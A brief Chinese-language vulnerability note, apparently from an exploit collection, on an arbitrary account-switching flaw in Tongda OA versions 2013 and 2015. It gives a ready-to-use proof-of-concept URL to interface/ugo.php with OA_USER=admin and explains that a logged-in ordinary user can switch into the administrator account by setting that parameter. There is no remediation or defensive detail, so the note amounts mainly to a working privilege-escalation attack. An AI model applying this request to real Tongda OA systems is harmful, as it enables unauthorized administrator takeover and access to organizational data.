通达oa 任意账号跳转 通达oa 任意账号跳转¶ 漏洞描述¶ 需要登录 漏洞影响¶ 2013、2015版本 漏洞复现¶ POC: http://url/interface/ugo.php?OA_USER=admin 通过控制OA_USER参数进行任意⽤户的跳转,⽐如说你现在是个普通权限的⽤户,使用这个⻚面即可跳转到admin用户下面。